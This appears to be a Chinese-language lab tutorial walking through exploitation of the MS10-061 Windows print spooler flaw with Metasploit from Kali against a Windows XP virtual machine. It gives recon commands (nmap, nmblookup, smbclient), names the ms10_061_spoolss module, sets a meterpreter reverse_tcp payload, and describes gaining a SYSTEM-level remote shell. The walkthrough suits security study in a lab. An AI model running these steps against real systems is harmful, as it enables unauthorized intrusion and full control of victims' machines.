Kali利用msf对MS10_061漏洞进行渗透测试

注意事项:

  • kail首次打开metasploit,会初始化数据,可能会有点慢,请耐心等待!
  • 本文仅供学习漏洞渗透测试,不得用于其他非法用途,否则造成的任何后果自负!!!

1. Metasploit简介

Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。详细介绍可以参考百度百科对 Mettasploit 的介绍。

2.打印后台程序服务模拟漏洞(CVE-2010-2729/MS10-061)

利用MSF中的攻击模块:ms10_061_spoolss,Windows打印后台程序没有充分的限制访问该服务的用户权限,攻击者可以通过提交特制的打印请求在Windows系统目录(%SystemRoot%\system32)中创建文件。攻击者可以指定任何文件名,包括目录遍历,通过WritePrinter请求,攻击者可以完全控制创建文件的内容。将文件写入到Windows系统目录(%SystemRoot%\system32)后,通过WMI来部署恶意程序,因为系统会自动运行%SystemRoot%\System32\Wbem\MOF文件夹的mof文件、执行命令。
该漏洞首次被发现并被利用于著名的Stuxnet蠕虫(俗称“震网”)

3.实验环境

VMware虚拟环境
攻击机:Kali Linux;目标机:Windows xp sp2

4.实验步骤

4.1 使用Nmap扫描目标机器是否存在NetBiosRPC服务
4.2 NetBios共享检测
4.3 使用MSF的ms10_061_spoolss模块攻击目标机

5.设置目标机环境

  1. 获取目标机IPKali利用msf对MS10_061漏洞进行渗透测试_第1张图片
  2. 创建打印共享(默认是没有打印共享)
    1)代开控制面板,选择打印机和其他硬件Kali利用msf对MS10_061漏洞进行渗透测试_第2张图片2)选择打印机和传真Kali利用msf对MS10_061漏洞进行渗透测试_第3张图片
    3)添加打印机Kali利用msf对MS10_061漏洞进行渗透测试_第4张图片4)本地打印机,不勾选“自动检测并安装即插即用打印机”Kali利用msf对MS10_061漏洞进行渗透测试_第5张图片
    5)选择使用LPT1端口Kali利用msf对MS10_061漏洞进行渗透测试_第6张图片
    随便选一个打印机厂商和型号Kali利用msf对MS10_061漏洞进行渗透测试_第7张图片取个名字Kali利用msf对MS10_061漏洞进行渗透测试_第8张图片选择共享打印机Kali利用msf对MS10_061漏洞进行渗透测试_第9张图片

6.在Kali上检测打印机

1)nmap扫描

nmap -sS -sU -O -p127-139,445 192.168.230.137

Kali利用msf对MS10_061漏洞进行渗透测试_第10张图片
2)查找NetBIOS

nmblookup -A 192.168.230.137

Kali利用msf对MS10_061漏洞进行渗透测试_第11张图片
NetBIOS工作站名字:123-13DFCFEDD88
NetBIOS组名:WORKGROUP

7.访问SMB资源

smbclient -L \\123-13DFCFEDD88 -I 192.168.230.137 -N

Kali利用msf对MS10_061漏洞进行渗透测试_第12张图片
看到了打印共享

8.使用MSF模块攻击

1)载入模块,搜索一下ms10_061Kali利用msf对MS10_061漏洞进行渗透测试_第13张图片
2)利用漏洞,并查看需要配置的参数
Kali利用msf对MS10_061漏洞进行渗透测试_第14张图片
3)配置参数在这里插入图片描述4)设置Payload

set payload windows/meterpreter/reverse_tcp

5)设置Payload参数在这里插入图片描述6)攻击Kali利用msf对MS10_061漏洞进行渗透测试_第15张图片攻击完成后,建立了远程会话,恶意程序写入到目标机的%SystemRoot%\system32\2Uy3ygTXtpVrWD.exe,恶意程序是通过%SystemRoot%\system32\wbem\mof\5V4jdMrNNFWWSH.mof控制运行的。
7)接下来可以执行一系列操作
getuidgetpidKali利用msf对MS10_061漏洞进行渗透测试_第16张图片
可以看到我们获取了系统的system权限

此时执行shell可以进入目标机的命令行界面在这里插入图片描述
至此,整个攻击过程已经大体结束,之后可以进行取证等一系列工作。最后感谢各位的阅读,由于本人水平有限,如有不足,敬请谅解。

你可能感兴趣的:(网络安全相关)